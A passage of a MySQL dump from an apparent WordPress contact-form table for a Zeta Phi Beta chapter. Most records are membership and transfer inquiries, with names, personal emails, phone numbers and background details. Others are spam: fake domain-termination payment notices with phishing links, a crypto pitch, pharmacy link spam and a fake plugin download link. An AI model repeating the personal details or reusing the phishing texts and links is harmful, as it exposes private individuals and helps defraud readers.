Membership'),(5345,449,10,4,'Notice#: 491343\r\nDate: 2020-12-16  \r\n\r\nYOUR IMMEDIATE ATTENTION TO THIS MESSAGE IS ABSOLUTELY NECESSARY!\r\n\r\nYOUR DOMAIN zphiblgz.org WILL BE TERMINATED WITHIN 24 HOURS\r\n\r\nWe have not received your payment for the renewal of your domain zphiblgz.org\r\n\r\nWe have made several attempts to reach you by phone, to inform you regarding the TERMINATION of your domain zphiblgz.org\r\n\r\nCLICK HERE FOR SECURE ONLINE PAYMENT: http://yourdomainborn.xyz/?n=zphiblgz.org&r=a&t=1608096105&p=v1\r\n\r\nIF WE DO NOT RECEIVE YOUR PAYMENT WITHIN 24 HOURS, YOUR DOMAIN zphiblgz.org WILL BE TERMINATED\r\n\r\nCLICK HERE FOR SECURE ONLINE PAYMENT: http://yourdomainborn.xyz/?n=zphiblgz.org&r=a&t=1608096105&p=v1\r\n\r\nACT IMMEDIATELY. \r\n\r\nThe submission notification zphiblgz.org will EXPIRE WITHIN 24 HOURS after reception of this email'),(5346,450,10,1.3,'Dawnielle'),(5347,450,10,1.6,'Eldridge'),(5348,450,10,3,'Dawnielle.Eldridge@gmail.com'),(5349,450,10,5,'(240) 917-1148'),(5350,450,10,2,'Interested in Membership'),(5351,450,10,4,'Good Afternoon \r\nMy name is Dawnielle . I am interested in joining this chapter'),(5352,451,10,1.3,'Noreesa'),(5353,451,10,1.6,'Williams'),(5354,451,10,3,'Noreesatwilliams@outlook.com'),(5355,451,10,5,'(240) 412-9952'),(5356,451,10,2,'Interested in Membership'),(5357,452,10,1.3,'Noreesa'),(5358,452,10,1.6,'Williams'),(5359,452,10,3,'Noreesatwilliams@outlook.com'),(5360,452,10,5,'(240) 412-9952'),(5361,452,10,2,'Interested in Membership'),(5362,452,10,4,'Hello! I am very interested in becoming a member! I meet the requirements of a Bachelor’s Degree from the accredited university Capitol Technology University, graduated in Spring 2018 with a GPA 3.51 in Electrical Engineering. I am also a graduate student at John’s Hopkins University for Computer and Electrical Engineering. \r\n\r\nWhile in high school and college I was a leader in my community. I was in an organization called Top Teens of America, Southern Maryland Chapter as a Financial Secretary until college. During college I had a lot of experience being a leader, such as an RA, tutor, lab assistant, President of a STEM club, and an advocate for the African American students. After graduating and becoming apart of the ‘real world’, I feel that I’ve lost my connection to my community and my ability to reach out to others. Joining Zeta Phi Beta sorority will allow me to reach a huge goal of mine and my family as well (my aunt and cousin are Zetas in New Jersey). \r\n\r\nI will joining the COVID 19 discussion tonight, but I hope to hear from you soon!'),(5363,453,10,1.3,'Cheyenne'),(5364,453,10,1.6,'Monroe'),(5365,453,10,3,'Cmonro3@icloud.com'),(5366,453,10,5,'(347) 818-0851'),(5367,453,10,2,'Inactive Member (Reclaim)'),(5368,453,10,4,'Hello SororZ, \r\n\r\nI am an active duty officer stationed in the area for a residency program and would love to celebrate founders day with you all and even observe the chapter if possible. Soror Lyken is from my undergraduate chapter, Epsilon Nu at SUNY Albany and she suggested that I reach out! My membership id number is 517965'),(5369,454,10,1.3,'Danielle'),(5370,454,10,1.6,'Hill'),(5371,454,10,3,'dehill02@yahoo.com'),(5372,454,10,5,'(910) 583-5293'),(5373,454,10,2,'Inactive Member (Reclaim)'),(5374,454,10,4,'Good Morning,\r\n\r\nI am interested in the reclamation process.  Your help is greatly appreciated.\r\n\r\nSisterly,\r\n\r\nSoror Danielle Hill'),(5375,455,10,1.3,'Aisha'),(5376,455,10,1.6,'Hilliard'),(5377,455,10,3,'Legaldove02@yahoo.com'),(5378,455,10,5,'(301) 785-0068'),(5379,455,10,2,'Current Active Member (Transfer)'),(5380,455,10,4,'Hello, I am interested in possibly transferring to Lambda Gamma Zeta and would like to attend one of your Chapter meetings. Also, if there are any upcoming events or service activities I would be interested in learning about and possibly attending those as well. Please let me know if you need anything from me.\r\n\r\nSisterly,\r\nSoror Aisha Hilliard\r\n301-785-0068'),(5381,456,10,1.3,'Alexis'),(5382,456,10,1.6,'Carter'),(5383,456,10,3,'Alexis.n.carter@gmail.com'),(5384,456,10,5,'(973) 715-5884'),(5385,456,10,2,'Inactive Member (Reclaim)'),(5386,456,10,4,'I have been inactive since 2005. I would like to reclaim Zeta, and join the Lambda Gamma Zeta Chapter.  Thank you'),(5387,457,10,1.3,'Dominique'),(5388,457,10,1.6,'Zackery'),(5389,457,10,3,'Dominique.Zackery@gmail.com'),(5390,457,10,5,'(202) 531-8818'),(5391,457,10,2,'Interested in Membership'),(5392,457,10,4,'Greetings, I wish to find out more information about this chapter and upcoming events for interested woman seeking membership.'),(5393,458,10,1.3,'Dominique'),(5394,458,10,1.6,'Zackery'),(5395,458,10,3,'Dominique.Zackery@gmail.com'),(5396,458,10,5,'(202) 531-8818'),(5397,458,10,2,'Interested in Membership'),(5398,458,10,4,'Greetings, I wish to find out more information about this chapter and upcoming events for interested woman seeking membership.'),(5399,459,10,1.3,'Dominique'),(5400,459,10,1.6,'Zackery'),(5401,459,10,3,'Dominique.Zackery@gmail.com'),(5402,459,10,5,'(202) 531-8818'),(5403,459,10,2,'Interested in Membership'),(5404,459,10,4,'Greetings, I wish to find out more information about this chapter and upcoming events for interested woman seeking membership.'),(5405,460,10,1.3,'Dominique'),(5406,460,10,1.6,'Zackery'),(5407,460,10,3,'Dominique.Zackery@gmail.com'),(5408,460,10,5,'(202) 531-8818'),(5409,460,10,2,'Interested in Membership'),(5410,460,10,4,'Greetings, I wish to find out more information about this chapter and upcoming events for interested woman seeking membership.'),(5411,461,10,1.3,'Joe'),(5412,461,10,1.6,'Miller'),(5413,461,10,3,'info@domainregistercorp.com'),(5414,461,10,5,'(125) 485-9342'),(5415,461,10,2,'Inactive Member (Reclaim)'),(5416,461,10,4,'Notice#: 491343\r\nDate: 2021-01-28  \r\n\r\nYOUR IMMEDIATE ATTENTION TO THIS MESSAGE IS ABSOLUTELY NECESSARY!\r\n\r\nYOUR DOMAIN zphiblgz.org WILL BE TERMINATED WITHIN 24 HOURS\r\n\r\nWe have not received your payment for the renewal of your domain zphiblgz.org\r\n\r\nWe have made several attempts to reach you by phone, to inform you regarding the TERMINATION of your domain zphiblgz.org\r\n\r\nCLICK HERE FOR SECURE ONLINE PAYMENT: https://domain-register.ga/?n=zphiblgz.org&r=a&t=1611796785&p=v1\r\n\r\nIF WE DO NOT RECEIVE YOUR PAYMENT WITHIN 24 HOURS, YOUR DOMAIN zphiblgz.org WILL BE TERMINATED\r\n\r\nCLICK HERE FOR SECURE ONLINE PAYMENT: https://domain-register.ga/?n=zphiblgz.org&r=a&t=1611796785&p=v1\r\n\r\nACT IMMEDIATELY. \r\n\r\nThe submission notification zphiblgz.org will EXPIRE WITHIN 24 HOURS after reception of this email'),(5417,462,10,1.3,'Edwina'),(5418,462,10,1.6,'Kollo (Bawuah)'),(5419,462,10,3,'Edwina.a.kollo@gmail.com'),(5420,462,10,5,'(804) 386-7776'),(5421,462,10,2,'Inactive Member (Reclaim)'),(5422,462,10,4,'Good evening Soror Williams,\r\n\r\nI hope you and your family have been happy and healthy during this time.  My time to reclaim has been long overdue and I am excited at the opportunity get to know the Sorors of  Lambda Gamma Zeta chapter.  I attended the reclamation event this afternoon (2/6/21) and was unable to rotate to the chapter’s breakout room.  I also found out about an event taking place on Monday, however I am unsure if the format is the same and if chapters will have representation in attendance.  I would be honored to have an opportunity to attend an event to learn more about the chapter and to get to know the Sorors.  I bring three additional Sorors with me who were also initiated with me in the Spring of 2004 and a few other Sorors from my chapter of initiation, Eta chapter. \r\n\r\nPlease let me know what next steps you recommend I should take. \r\n\r\nSoror Edwina Kollo, Spring 2004'),(5423,463,10,1.3,'Edwina'),(5424,463,10,1.6,'Kollo (Bawuah)'),(5425,463,10,3,'Edwina.a.kollo@gmail.com'),(5426,463,10,5,'(804) 386-7776'),(5427,463,10,2,'Inactive Member (Reclaim)'),(5428,463,10,4,'Good evening Soror Williams,\r\n\r\nI hope you and your family have been happy and healthy during this time.  My time to reclaim has been long overdue and I am excited at the opportunity get to know the Sorors of  Lambda Gamma Zeta chapter.  I attended the reclamation event this afternoon (2/6/21) and was unable to rotate to the chapter’s breakout room.  I also found out about an event taking place on Monday, however I am unsure if the format is the same and if chapters will have representation in attendance.  I would be honored to have an opportunity to attend an event to learn more about the chapter and to get to know the Sorors.  I bring three additional Sorors with me who were also initiated with me in the Spring of 2004 and a few other Sorors from my chapter of initiation, Eta chapter. \r\n\r\nPlease let me know what next steps you recommend I should take. \r\n\r\nSoror Edwina Kollo, Spring 2004'),(5429,464,10,1.3,'Nikesha'),(5430,464,10,1.6,'Kersey'),(5431,464,10,3,'keshak01@icloud.com'),(5432,464,10,5,'(410) 206-6734'),(5433,464,10,2,'Inactive Member (Reclaim)'),(5434,464,10,4,'I started the process a few years ago but wasn\'t able to complete. I am ready to complete the process now. I have a transfer card from TDZ but not sure if an updated transfer is needed.  Please provide me with the associated cost.  Thanks in advance for your time.\r\n\r\nSisterly,\r\nSoror Nikesha Kersey'),(5435,465,10,1.3,'Nina'),(5436,465,10,1.6,'Lamb-Hill'),(5437,465,10,3,'nina_lamb@comcast.net'),(5438,465,10,5,'(443) 756-8811'),(5439,465,10,2,'Interested in Membership'),(5440,465,10,4,'Greetings, \r\n\r\nI pray this message reaches you in good faith and spirits during this time.  Post a lively conversation with Lillet Williams, chapter President, I\'m updating my letter of interest to become a member of Zeta Phi Beta, Inc., Lambda Gamma Zeta Chapter. \r\n\r\nI\'m looking forward to seeing familiar and new faces at the Above the Mask, Make-up Tutorial this Friday. And getting to know chapter members via future public fundraisers and community service functions. \r\n\r\nAlways feel free to reach out.  I welcome connections and conversations. \r\n\r\nKind Regards, \r\nNina C. Lamb-Hill'),(5441,466,10,1.3,'Bitmybitbro'),(5442,466,10,1.6,'BitmybitbroX'),(5443,466,10,3,'saida.kanatbek.kyzy@gmail.com'),(5444,466,10,5,'(463) 042-0603'),(5445,466,10,2,'Interested in Membership'),(5446,466,10,4,'Hi dear! \r\nBitcoin raised over 50000$ and seting new price records every day. Ethereum has already grown to $ 1800! The launch of futures trading in Ethereum will push the price up to $ 10,000 and higher! Hurry up to make money on the upcoming growth of this currency. Register a wallet and join our community of millionaires. \r\n \r\nIf you have any questions, please reply to this message, we will try to answer as soon as possible - saida.kanatbekkyzy@gmail.com'),(5447,467,10,1.3,'Julaya'),(5448,467,10,1.6,'Lewis'),(5449,467,10,3,'julayalewis@icloud.com'),(5450,467,10,5,'(443) 220-9241'),(5451,467,10,2,'Interested in Membership'),(5452,467,10,4,'I am a UMBC student and I graduate may 21,2021 and I want to become a member!'),(5453,468,10,1.3,'Ifeoma'),(5454,468,10,1.6,'Obi'),(5455,468,10,3,'Icejiogu@gmail.com'),(5456,468,10,5,'(347) 249-0153'),(5457,468,10,2,'Interested in Membership'),(5458,469,7,1.3,'Sabrine'),(5459,469,7,1.6,'Semper'),(5460,469,7,2,'sarra.ibrahim@gmail.com'),(5461,469,7,3,'Archonette Club'),(5462,469,7,4,'I have been doing Community service since Elementary school. I’m interested community service , leadership program and having mentor. \r\nThank you in advance,\r\nSabrine Semper'),(5463,470,10,1.3,'Imani'),(5464,470,10,1.6,'Charles'),(5465,470,10,3,'Imanin.charles@yahoo.com'),(5466,470,10,5,'(410) 428-6038'),(5467,470,10,2,'Interested in Membership'),(5468,470,10,4,'Greetings,\r\n\r\nI am interested in your organization and wanted to know the next step with applying towards membership'),(5469,471,10,1.3,'Stacey'),(5470,471,10,1.6,'Sartor'),(5471,471,10,3,'Sdsartor@gmail.com'),(5472,471,10,5,'(443) 768-4928'),(5473,471,10,2,'Inactive Member (Reclaim)'),(5474,471,10,4,'Hello,\r\nI have been inactive for quite a while,  but pledged as an undergraduate in 1990 (Rho Alpha- Hampton.) I would like to become more active with my sorority and am contacting you because I live in HoCo. I very much look forward to hearing from you and learning what steps I need to take.\r\n\r\nThanks,\r\n\r\nStacey Sartor'),(5475,472,10,1.3,'Cynthia'),(5476,472,10,1.6,'Burke'),(5477,472,10,3,'8burkecynth@gmail.com'),(5478,472,10,5,'(240) 855-9888'),(5479,472,10,2,'Interested in Membership'),(5480,472,10,4,'I am interested in becoming a member of Zeta Phi Beta. I looked at the qualifications for membership and believe I meet the requirements. \r\n\r\nWould I need to attend an Informational Interest meeting. Are there still meetings being held? If so, is it virtual or in person?'),(5481,473,10,1.3,'Julaya'),(5482,473,10,1.6,'Lewis'),(5483,473,10,3,'julayalewis@icloud.com'),(5484,473,10,5,'(443) 220-9241'),(5485,473,10,2,'Current Active Member (Transfer)'),(5486,473,10,4,'I will like to know when I can apply for membership program?'),(5487,474,10,1.3,'Kendra'),(5488,474,10,1.6,'Cooper'),(5489,474,10,3,'Kendra.cooper97@gmail.com'),(5490,474,10,5,'(240) 605-1583'),(5491,474,10,2,'Interested in Membership'),(5492,474,10,4,'Good Morning, my name is Kendra Cooper. I am a recent graduate of Frostburg State University. I have done my research and I believe I am ready to dedicate my time and efforts to becoming a finer woman. I would love to hear more about the organization and your chapter specifically.'),(5493,475,10,1.3,'Stephanie'),(5494,475,10,1.6,'Patterson'),(5495,475,10,3,'sepatterson25@gmail.com'),(5496,475,10,5,'(240) 432-3138'),(5497,475,10,2,'Interested in Membership'),(5498,476,10,1.3,'Stephanie'),(5499,476,10,1.6,'Patterson'),(5500,476,10,3,'sepatterson25@gmail.com'),(5501,476,10,5,'(240) 432-3138'),(5502,476,10,2,'Interested in Membership'),(5503,476,10,4,'Madame Vice President Lillet Williams, \r\n\r\nPlease accept my interest in membership to this prestigious organization.  Providing public service to globally impact the world and focus on the needs of others is the catalyst of my interest. \r\n\r\nThank you so much for your time. \r\n\r\nHumbly submitted, \r\nStephanie Patterson'),(5504,477,10,1.3,'Stephanie'),(5505,477,10,1.6,'Patterson'),(5506,477,10,3,'sepatterson25@gmail.com'),(5507,477,10,5,'(240) 432-3138'),(5508,477,10,2,'Interested in Membership'),(5509,477,10,4,'Madame Vice President Lillet Williams, \r\n\r\nPlease accept my interest in membership to this prestigious organization.  Providing public service to globally impact the world and focus on the needs of others is the catalyst of my interest. \r\n\r\nThank you so much for your time. \r\n\r\nHumbly submitted, \r\nStephanie Patterson'),(5510,478,10,1.3,'Stephanie'),(5511,478,10,1.6,'Patterson'),(5512,478,10,3,'sepatterson25@gmail.com'),(5513,478,10,5,'(240) 432-3138'),(5514,478,10,2,'Interested in Membership'),(5515,478,10,4,'Madame Vice President Lillet Williams, \r\n\r\nPlease accept my interest in membership to this prestigious organization.  Providing public service to globally impact the world and focus on the needs of others is the catalyst of my interest. \r\n\r\nThank you so much for your time. \r\n\r\nHumbly submitted, \r\nStephanie Patterson'),(5516,479,10,1.3,'Stephanie'),(5517,479,10,1.6,'Patterson'),(5518,479,10,3,'sepatterson25@gmail.com'),(5519,479,10,5,'(240) 432-3138'),(5520,479,10,2,'Interested in Membership'),(5521,479,10,4,'Madame Vice President Lillet Williams, \r\n\r\nPlease accept my interest in membership to this prestigious organization.  Providing public service to globally impact the world and focus on the needs of others is the catalyst of my interest. \r\n\r\nThank you so much for your time. \r\n\r\nHumbly submitted, \r\nStephanie Patterson'),(5522,480,10,1.3,'Dawnielle'),(5523,480,10,1.6,'Herbert'),(5524,480,10,3,'Dawnielle.Herbert@gmail.com'),(5525,480,10,5,'(240) 917-1148'),(5526,480,10,2,'Interested in Membership'),(5527,480,10,4,'Good Afternoon my name is Dawnielle . I am graduate student . I am interested in your chapter . I have heard awesome things and want to pursue in it'),(5528,481,10,1.3,'Marceline (Marsha)'),(5529,481,10,1.6,'Davis'),(5530,481,10,3,'Marceline-_td@yahoo.com'),(5531,481,10,5,'(240) 475-0233'),(5532,481,10,2,'Current Active Member (Transfer)'),(5533,481,10,4,'Good morning Sorors,\r\nI am currently in Rho Eta Zeta chapter(Anne Arundel County) but I’m interested in transferring to the Howard County   chapter since I live in Columbia.  I’m would like to sit in on any events that you may have coming up including chapter meetings. I look forward to hearing from you and meeting my Sorors. Thanks so much\r\nSisterly,\r\nMarsha Turner Davis'),(5534,482,7,1.3,'Shesani'),(5535,482,7,1.6,'Cabassa'),(5536,482,7,2,'Bergersquare@hrehllc.com'),(5537,482,7,3,'Pearlette Club'),(5538,482,7,4,'Hi,\r\n\r\nMy name is Shesani Cabassa, I am currently the community manager at Berger Square apartments here in Odenton.  Our community owners actively seek to enhance the resident experience by providing services in education, health & nutrition, and other areas.\r\n\r\nWe have had several residents express an interest in continuing education resources. I was wondering if currently your program provided onsite counseling services, or information sessions that we could schedule for the resident\'s interested here at our community or even an online virtual informational meeting that we could set up. I believe the young woman of the community could benefit from a program as such and wanted to gather more information. \r\n\r\nAny information on all age groups  that you can provide would be greatly appreciated. \r\n\r\nThank you,\r\nShesani Cabassa\r\nCommunity Manager'),(5539,483,10,1.3,'Shantavia'),(5540,483,10,1.6,'Green'),(5541,483,10,3,'shgreen@smcm.edu'),(5542,483,10,5,'(443) 554-1078'),(5543,483,10,2,'Interested in Membership'),(5544,483,10,4,'Hi,\r\nI am Shantavia Green I graduated from St. Mary\'s College of Maryland on May 8, 2021, with a BS degree. My GPA was a 2.55. I would like to learn about the Zet. Thank you'),(5545,484,10,1.3,'Marceline'),(5546,484,10,1.6,'Davis'),(5547,484,10,3,'Marceline_td@yahoo.com'),(5548,484,10,5,'(340) 475-0233'),(5549,484,10,2,'Current Active Member (Transfer)'),(5550,484,10,4,'Hello Soror, I am interested in transferring to the Howard county chapter. I would like to visit during any programs and chapter meetings. Thank you. Marsha  Davis'),(5551,485,10,1.3,'Michelle'),(5552,485,10,1.6,'Moore'),(5553,485,10,3,'mlmoorephz@gmail.com'),(5554,485,10,5,'(301) 498-8913'),(5555,485,10,2,'Current Active Member (Transfer)'),(5556,485,10,4,'I would like to sit in on chapter meeting an d upcoming activities.'),(5557,486,10,1.3,'ignornone'),(5558,486,10,1.6,'ignornonegh'),(5559,486,10,3,'Corodourb@zhess.xyz'),(5560,486,10,5,'(642) 138-2302'),(5561,486,10,2,'Interested in Membership'),(5562,486,10,4,'<a href=http://vslevitrav.com/>cheap levitra canada'),(5563,487,10,1.3,'Tammie'),(5564,487,10,1.6,'Edwards'),(5565,487,10,3,'tammiemichelle43@outlook.com'),(5566,487,10,5,'(478) 342-7296'),(5567,487,10,2,'Interested in Membership'),(5568,487,10,4,'Hello! I am hoping this message finds everyone doing well.  I am really excited about having the opportunity to connect and continue serving the community.  Looking forward to hearing from you. Wishing you a wonderful day!\r\n\r\nV/r\r\nTammie'),(5569,488,10,1.3,'Tammie'),(5570,488,10,1.6,'Edwards'),(5571,488,10,3,'tammiemichelle43@outlook.com'),(5572,488,10,5,'(478) 342-7296'),(5573,488,10,2,'Interested in Membership'),(5574,488,10,4,'Hello! I am hoping this message finds everyone doing well.  I am really excited about having the opportunity to connect and continue serving the community.  Looking forward to hearing from you. Wishing you a wonderful day!\r\n\r\nV/r\r\nTammie'),(5575,489,10,1.3,'Stephanie'),(5576,489,10,1.6,'Patterson'),(5577,489,10,3,'sepatterson25@gmail.com'),(5578,489,10,5,'(240) 432-3138'),(5579,489,10,2,'Interested in Membership'),(5580,489,10,4,'Greetings,\r\n\r\nI would like to express interest in the Howard County,  Lambda Gamma Zeta Chapter.   \r\n\r\nThank you for your consideration.'),(5581,490,10,1.3,'ignornone'),(5582,490,10,1.6,'ignornonegh'),(5583,490,10,3,'Corodourb@manmail.xyz'),(5584,490,10,5,'(610) 166-1523'),(5585,490,10,2,'Interested in Membership'),(5586,490,10,4,'<a href=https://vscialisv.com>best site to buy cialis online'),(5587,491,10,1.3,'ignornone'),(5588,491,10,1.6,'ignornonegh'),(5589,491,10,3,'Corodourb@manmail.xyz'),(5590,491,10,5,'(803) 207-1568'),(5591,491,10,2,'Interested in Membership'),(5592,491,10,4,'<a href=https://priligyset.com>reliable source for dapoxetine'),(5593,492,10,1.3,'Tammie'),(5594,492,10,1.6,'Edwards'),(5595,492,10,3,'tammiemichelle43@outlook.com'),(5596,492,10,5,'(478) 342-7296'),(5597,492,10,2,'Interested in Membership'),(5598,492,10,4,'Hello Ms. Williams, hope you are well. I am definitely interested in joining your organization. Would love to get information on your next event. Looking forward to hearing from you. Thank you for your time.\r\n\r\nV/r\r\nTammie Edwards'),(5599,493,10,1.3,'Tammie'),(5600,493,10,1.6,'Edwards'),(5601,493,10,3,'tammiemichelle43@outlook.com'),(5602,493,10,5,'(478) 342-7296'),(5603,493,10,2,'Interested in Membership'),(5604,493,10,4,'Hello Ms. Williams, hope you are well. I am definitely interested in joining your organization. Would love to get information on your next event. Looking forward to hearing from you. Thank you for your time.\r\n\r\nV/r\r\nTammie Edwards'),(5605,494,10,1.3,'Rondallyn'),(5606,494,10,1.6,'McKinzie'),(5607,494,10,3,'rtld34@gmail.com'),(5608,494,10,5,'(240) 463-6709'),(5609,494,10,2,'Interested in Membership'),(5610,494,10,4,'Greetings!\r\n\r\nMy name is Rondallyn McKinzie and I am interested in becoming a member the of Zeta Phi Beta Sorority. I recently graduated from Strayer University with my Bachelor\'s degree in December 2020. I am currently pursuing my MBA from Stayer University.  I live in Ellicott City, MD and I\'m 45 years old. Are you able to provide additional information on memberships?\r\n\r\n\r\nThank you in advanced for your help!'),(5611,495,10,1.3,'ignornone'),(5612,495,10,1.6,'ignornonegh'),(5613,495,10,3,'Corodourb@manmail.xyz'),(5614,495,10,5,'(180) 825-7243'),(5615,495,10,2,'Interested in Membership'),(5616,495,10,4,'<a href=https://vslevitrav.com/>india 4  pharmacy levitra cheap</a>'),(5617,496,7,1.3,'DavidTrots'),(5618,496,7,1.6,'DavidTrotsNM'),(5619,496,7,2,'herthag1983@bk.ru'),(5620,496,7,3,'Archonette Club'),(5621,496,7,4,'Hi \r\nBest offer 2021 https://is.gd/OUL6yh'),(5622,497,10,1.3,'https://tinysrc.me/go/hg0PJIWng'),(5623,497,10,1.6,'https://tinysrc.me/go/hg0PJIWngAH'),(5624,497,10,3,'abc037cdsq09@mail.com'),(5625,497,10,5,'(834) 112-0676'),(5626,497,10,2,'Interested in Membership'),(5627,497,10,4,'You will be pleasantly surprised to learn about our generous offer. \r\nThe link to our offer is valid for only one day https://tinysrc.me/go/hg0PJIWng'),(5628,498,10,1.3,'ignornone'),(5629,498,10,1.6,'ignornonegh'),(5630,498,10,3,'Corodourb@manmail.xyz'),(5631,498,10,5,'(344) 035-4521'),(5632,498,10,2,'Interested in Membership'),(5633,498,10,4,'<a href=https://cialiswwshop.com/>cialis generic tadalafil</a>'),(5634,499,7,1.3,'gugappown'),(5635,499,7,1.6,'gugappownqO'),(5636,499,7,2,'AddifsNof@swmail.xyz'),(5637,499,7,3,'Archonette Club'),(5638,499,7,4,'<a href=http://cialiswwshop.com/>where can i buy cialis on line</a>'),(5639,500,10,1.3,'ignornone'),(5640,500,10,1.6,'ignornonegh'),(5641,500,10,3,'Corodourb@manmail.xyz'),(5642,500,10,5,'(665) 825-2583'),(5643,500,10,2,'Interested in Membership'),(5644,500,10,4,'<a href=https://cialiswwshop.com/>best cialis online</a>'),(5645,501,7,1.3,'gugappown'),(5646,501,7,1.6,'gugappownqO'),(5647,501,7,2,'AddifsNof@swmail.xyz'),(5648,501,7,3,'Archonette Club'),(5649,501,7,4,'<a href=http://cialiswwshop.com/>cheapest cialis 20mg</a>'),(5650,502,7,1.3,'QGWZ1LF8YZRZJ02WXF   www.web.de'),(5651,502,7,1.6,'QGWZ1LF8YZRZJ02WXF   www.yandex.com'),(5652,502,7,2,'centmantin-za6agp5@mail.ru'),(5653,502,7,3,'Amicette Club'),(5654,502,7,4,'QGWZ1LF8YZRZJ02WXF   www.google.com\r\n   I have a small question for you');
/*!40000 ALTER TABLE `lwz_rg_lead_detail` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_rg_lead_detail_long`
--

DROP TABLE IF EXISTS `lwz_rg_lead_detail_long`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_rg_lead_detail_long` (
  `lead_detail_id` bigint(20) unsigned NOT NULL,
  `value` longtext,
  PRIMARY KEY (`lead_detail_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_rg_lead_detail_long`
--

LOCK TABLES `lwz_rg_lead_detail_long` WRITE;
/*!40000 ALTER TABLE `lwz_rg_lead_detail_long` DISABLE KEYS */;
INSERT INTO `lwz_rg_lead_detail_long` VALUES (4,'Good Morning,\r\n\r\nMy name is Pamela Sumah and I am interested in finding out more about LGZ. I currently reside and work in Howard County, and looking to get involved in a chapter that is closer than my initiating chapter Beta Zeta in DC.\r\n\r\nI may be contacted either by email pamela.sumah.06@gmail.com or phone at 301.807.3744.\r\n\r\nI look forward to hearing from you and finding out more about the chapter.\r\n\r\nWith Sisterly Love,\r\n\r\nPamela'),(12,'You have been chosen by WordPress community to try out our new All in One SEO Pack Pro v2.1. For further information please click on the following link where you can also find the download link http://www.wordpresscommunity.net/all-in-one-seo-pack/\r\nWordpress Community http://www.wordpresscommunity.net'),(319,'I am a social worker that is the program coordinator for Howard County Public Schools Teen Parent Program. I wanted to find out if I could get some invitations for your \"pretty and polished affair\". I have several teen moms who are seniors in high school that could benefit from this program. Any information would be greatly appreciated.'),(574,'HI My name is Brandon Barrett and I am a member of Alpha Phi Alpha\'s, Kappa Phi Lambda chapter.  I am reaching out to you because I would like to make a donation to the W. Ruth Conway scholarship fund.  How do I go about doing this? \r\n\r\nBBarrett1906@yahoo.com\r\n(410)382-1384\r\n\r\nThank you, \r\n\r\nBrandon Barrett'),(580,'Good Afternoon, \r\n    My name is Bethany Peters and I attend Frostburg State University. I am interested in bringing back the Zetas to our school but I am unaware of the steps I need to take to make this happen. Ever since I was little, I wanted to become a Zeta not only because I believe and agree what the sorority stands for;but also because my mother is a Zeta. I would have the utmost appreciation if you could help me reestablish the Zeta sorority. Thank you for your time and have a great day.'),(586,'Hello my name is Karen (Moses) Parham and I became a Zeta Fall of 1989. I pledged undergrad Eta Omicron Zeta/Zeta Lambda Kean College of NJ now Kean University. The last chapter I was with was Gamma Omicron Zeta 1991-1992. I moved to Baltimore in 1997 but never joined a chapter. Please email me or contact me at 443-570-4774. I also contacted the national headquarter regarding reactivation of my membership.\r\n \r\n \r\nThanks'),(592,'Greetings,\r\n\r\nI am interested in learning more of what is required in becoming a member of Zeta Phi Beta. In addition, I would like more information on how I can now become an active volunteer in helping to serve in your community events..  I currently hold a Bachelors Degree  and after 18 years of a long successful career in Information Technology, I plan to make a career change to Secondary Education/ Higher Ed, and pursue a Master of Fine Arts in Creative Writing & Publishing.  My long passion has been to write and teach all things literature, and I am finally walking in my destiny.   I want to be a part of a strong sisterhood that carries the same passion that I share for educating people of all ages and backgrounds and serving the community with a purpose. \r\n\r\nWarm Regards,\r\n\r\nAva Lawson'),(610,'Greetings Sorors,\r\nI am interested in attending your next chapter meeting. I, along with another Soror, am interested in being reclaimed and would like to find out more information about your chapter. You can also reach me at (410) 655-5626. \r\n\r\nYours Truly,\r\nSoror Michele Franklin'),(628,'Call for Entries: Martin Luther King Student Essay contest and Nominations for Living the Dream Award\r\nDear Community Leader:\r\n\r\nI am sending you information on two Calls for Entries: The Martin Luther King Essay Contest for Middle and High School Age Students and the Living the Dream Award, which this year will honor both an individual and an organization that has embodied the legacy of Dr. King in  the Howard County community. We hope you will share this information with your community, families and colleagues. \r\n\r\nWe invite you to nominate candidates for the Living the Dream Award, and we also ask that you spread the word about the Student Essay Contest. Please see details in the attached documents. Cannot attach the documents. Please call asap because the essay deadline is Nov. 5\r\n\r\nPlease direct any questions to Mary Toth, Outreach Coordinator for the MLK Commission at 410-313-6467 or email mtoth@howardcountymd.gov.  I deeply appreciate your help in spreading the word.\r\n\r\nThank you.'),(634,'Good morning! I am interested in pursuing memebership in Zeta Phi Beta Sorority, Inc.  I currently have a bachelors degree and I woild love more information please.  Thank you in advance.\r\n\r\n~CasSandra Dorsey'),(664,'Hi my name is Sharon Middleton and I like to join the Lambda Gamma Zeta.  I have a degree in Business Administration.  I live in Howard County.  You stated in order to join you have to meet specific requirements outline by our National headquarters.  I could not find that information, can you please provide that information.\r\n\r\nThanks'),(696,'i filled out a form earlier regarding interest but I think it was in the wrong place. I am interested in becoming a zeta. I like doing community service and am currently doing service. But I\'ve had a interest in becoming a zeta for a while. I have tons of friends and family that are blue and white, but when I moved here from buffalo ny I didn\'t pursue it. Now Im in columbia md and I sparked my interest again.'),(758,'I pledged Zeta Phi Bet-Alpha Chapter and never joined the graduate chapter. I now live in Hagerstown, MD. It seems this is the closest chapter. I have been without the sisterhood for many years and would love to attend the events and become involved.  My name when I pledged was Annette K. Miller.  I now use my performing name.I recently learned that my family history relates to the establishment of Greek organizations for African Americans.This has renewed my faith that my work with the Zetas is clearly not over.'),(772,'Greetings Sorors,\r\n\r\nI hope that this message finds you all well. My name is Cortnie Fisher and I’m fairly new to the DMV area – I just relocated to Columbia in March, but to MD back in September. I’m reaching out as I am in search of a chapter to transfer into. I am, originally, a Michigan Zeta belonging to Zeta Nu Zeta of Inkster, MI; and a former visiting soror with Iota Zeta chapter of Indianapolis, IN – which both my mother and sister belong to. I would love the opportunity to visit in meeting the Sorors of your Lambda Gamma Zeta and in learning of any events or service opportunities that you all have coming up. I can be reached at (734) 430-2976 or fisher.cortnie@yahoo.com. I really hope to hear from you all soon.\r\n\r\nThank you so much for your time.\r\n \r\nSisterly,\r\n \r\nCortnie Fisher\r\nfisher.cortnie@yahoo.com\r\n(734) 430-2976'),(778,'Hello Sorors! I would like information about the chapter and meetings. I moved to Columbia in 2008 and was reclaimed to Beta Zeta chapter. However, I have not been financial  since before 2011 and I am interested in becoming active.  I would appreciate any info you could provide.  Thank you!\r\n\r\nAditya McDuffy Coston (formerly 